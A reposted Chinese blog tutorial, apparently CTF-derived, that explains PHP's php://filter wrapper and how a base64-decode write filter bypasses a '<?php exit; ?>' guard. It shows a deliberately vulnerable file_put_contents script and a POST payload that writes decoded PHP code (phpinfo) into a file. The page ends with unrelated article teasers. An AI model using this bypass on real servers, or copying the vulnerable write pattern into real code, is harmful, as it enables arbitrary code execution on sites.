php;//filter的介绍和应用

知识点

php://filter

php://filter是一种元封装器,是PHP中特有的协议流,设计用于数据流打开时的筛选过滤应用,作用是作为一个“中间流”来处理其他流。
php://filter目标使用以下的参数作为它路径的一部分。复合过滤链能够在一个路径上指定。

名称 描述 备注
resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选
read=<读链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。 可选
write=<写链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。 可选
<;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。
PHP file_put_contents()

file_put_contents() 函数把一个字符串写入文件中。
file_put_contents(file,data,mode,context)
file 必需。规定要写入数据的文件。如果文件不存在,则创建一个新文件。
data 可选。规定要写入文件的数据。可以是字符串、数组或数据流。


实例介绍

eee.php
<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
?>

当用户通过POST方式提交一个数据时,会和exit拼接,从而造成提交的数据不能被执行。

txt=aPD9waHAgcGhwaW5mbygpOyA/Pg==&filename=php://filter/write=convert.base64-decode/resource=b.png

向b.png写入,解码后的$content拼接上txt的内容
base64编码中只包含64个可打印字符,当PHP遇到不可解码的字符时,会选择性的跳过,这个时候base64就相当于以下的过程:

<?php
$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);
base64_decode($_GET['txt']);

所以,当$content 包含 <?php exit; ?>时,解码decode过程会先去除识别不了的字符,都将被去除,于是剩下的字符就只有phpexit以及我们传入的字符了。由于base64是4个byte一组,再添加一个字符例如添加字符’a’后,将’phpexita’当做两组base64进行解码,也就绕过这个死亡exit了。

phpexitaPD9waHAgcGhwaW5mbygpOyA/Pg==
phpe xita aPD9 waHA ... ...
phae xita 解码失败

image

后面分组正常能继续正常解码

image

此处参考:从一题CTF学习php://filter伪协议

原文链接:https://www.cnblogs.com/1zpeasy/p/16914687.html

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php;//filter的介绍和应用 - Python技术站

(0)
上一篇 2023年4月18日
下一篇 2023年4月18日

相关文章

  • php 设计模式之 单例模式

    PHP 设计模式之 单例模式 单例模式是指保证一个类仅有一个实例,并提供一个访问它的全局访问点。单例模式常用于管理共享的资源,例如数据库连接对象、文件系统等。 实现单例模式的步骤 通过将类的构造函数设置为私有,以防止外部创建新的对象实例。 创建一个静态方法,它将作为类的唯一入口。该方法将负责创建或返回现有实例的引用(如果已经存在)。 示例一:数据库连接类 以…

    PHP 2023年5月30日
    00
  • php常用字符串比较函数实例汇总

    下面是对 “php常用字符串比较函数实例汇总” 的详细讲解攻略。 1. 常用字符串比较函数的介绍 在 PHP 中,有许多常用的字符串比较函数,常用的包括以下几个: strcmp():比较两个字符串是否相等,区分大小写。 strcasecmp():比较两个字符串是否相等,不区分大小写。 strncasecmp():比较两个字符串的前n个字符是否相等,不区分大小…

    PHP 2023年5月26日
    00
  • 使用php重新实现PHP脚本引擎内置函数

    要使用 PHP 重新实现 PHP 脚本引擎内置函数,可以遵循以下步骤: 阅读 PHP 官方文档,了解要实现的内置函数的工作原理和用途。然后,可以编写 PHP 代码模仿这些内置函数的行为。 使用PHP的扩展机制,将实现的代码打包成扩展,以供 PHP 引擎加载。PHP 5 及以上版本支持 Zend 引擎的扩展机制,有助于更轻松地使用C实现功能拓展。此外,PECL…

    PHP 2023年5月27日
    00
  • php动态生成JavaScript代码

    要实现在 PHP 中动态生成 JavaScript 代码,有几个基本步骤: PHP 生成 JavaScript 代码时,需要使用字符串拼接的方式,将 JavaScript 代码以字符串的方式拼接起来。 PHP 中的字符串中如果包含 JavaScript 字符串中的特殊字符,例如双引号、单引号、反斜杠等,需要进行转义,以避免出现语法错误。可以使用转义字符 \ …

    PHP 2023年5月23日
    00
  • PHP教程 变量定义

    PHP教程:变量定义 变量是指在程序中存储数据的容器,在PHP中,可以使用不同的方式来定义变量。定义变量时需要为其指定一个名字,该名字用于在程序中读取和更改变量的内容。以下是两种定义变量的方式: 1. 直接赋值 直接赋值是一种简单的方式,可以在赋值时同时定义变量。在PHP中,不需要指定变量的类型,PHP会自动根据赋值时的变量类型来确定变量类型。例如: $na…

    PHP 2023年5月23日
    00
  • 10款实用的PHP开源工具

    10款实用的PHP开源工具攻略 PHP开源工具很多,包含了前端、后台、安全等方面。这里我们将介绍10款实用的PHP开源工具,并且给出详细的攻略。 1. Composer Composer是PHP的一个包管理工具,可以方便地安装、更新和导出PHP项目中的依赖包。使用Composer可以避免手动下载和安装库,从而可以更轻松地构建和维护项目。使用Composer的…

    PHP 2023年5月24日
    00
  • php基础字符串与数组知识点讲解

    以下是“PHP基础字符串与数组知识点讲解”的完整使用攻略,包括字符串和数组的基本概念、常用操作示例说明等内容。 字符串 基本概念 字符串是一种数据,用于表示文本数据。在PHP中,字符串可以用单引号或双引号括起来,例如: $str1 = ‘Hello, world!’; $str2 = "Hello, PHP!"; 常用操作 以下是字符串常…

    PHP 2023年5月12日
    00
  • PHP实现简单登录界面

    下面是PHP实现简单登录界面的详细攻略。 1.前言 在Web开发中,登录界面是一个必不可少的部分,通过用户输入正确的用户名和密码,可以进行身份验证,从而让用户进入网站的其他功能页面。 本文将详细讲解如何使用PHP实现简单的登录界面,包括如何设计用户表、如何使用表单来接收用户的输入、如何使用PHP代码来验证用户的身份以及如何登录成功后跳转到其他页面。 2. 设…

    PHP 2023年5月23日
    00
合作推广
合作推广
分享本页
返回顶部